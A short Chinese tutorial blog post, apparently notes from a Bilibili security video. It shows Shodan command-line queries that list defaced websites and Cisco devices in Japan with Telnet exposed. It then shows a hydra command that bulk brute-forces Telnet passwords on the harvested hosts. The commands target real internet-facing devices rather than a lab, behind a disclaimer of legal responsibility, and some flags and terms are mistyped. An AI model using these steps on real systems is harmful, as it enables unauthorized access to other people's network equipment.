声明：学习视频来自b站up主 泷羽sec，如涉及侵权马上删除文章

声明：本文主要用作技术分享，所有内容仅供参考。任何使用或依赖于本文信息所造成的法律后果均与本人无关。请读者自行判断风险，并遵循相关法律法规。

感谢泷羽sec 团队的教学
视频地址：shodan(4)_哔哩哔哩_bilibili

---

本文主要讲解如何去寻找被挂黑页的网站，以及利用Shodan去搜索具有弱口令的路由器交换机设备。

一、寻找被挂黑页的网站

shodan search --limit 50 --fields ip_str,port http.title:hacked by

该命令用于查找被标记为“hacked by”的网站。以下是该命令的详细解析：

命令解析

• shodan search：启动 Shodan 的搜索查询。
• --limit 50：限制结果为 50 条。
• --fields ip_str,port：指定返回的结果字段，包括 IP 地址和端口号。
• http.title:hacked by：搜索条件，查找网页标题中包含“hacked by”的网站。

二、搜索弱口令设备

shodan search --limit 50 --fields ip_str,port "cisco -authorired port:23" country:JP

这条命令是用于查找思科设备上授权的 Telnet 连接（端口 23）。以下是该命令的详细解析：

命令解析

• shodan search：启动 Shodan 的搜索查询。
• --limit 50：限制结果为 50条。
• --fields ip_str,port：指定返回的结果字段，包括 IP 地址和端口号。
• "cisco -authorired"：搜索条件，查找与思科设备相关的条目，但排除那些标记为“授权”的设备。
• port:23：限制搜索范围为在端口 23（Telnet）上运行的设备。
• country:JP：限制搜索国家为日本。

 

使用kali上的工具hydra进行批量爆破

hydra -l cisco -p /root/桌面/pws.txt -M /root/桌面/rkl.txt telnet

具体用法可以参照这位师傅的博客：Hydra密码爆破工具使用教程图文教程（超详细）-CSDN博客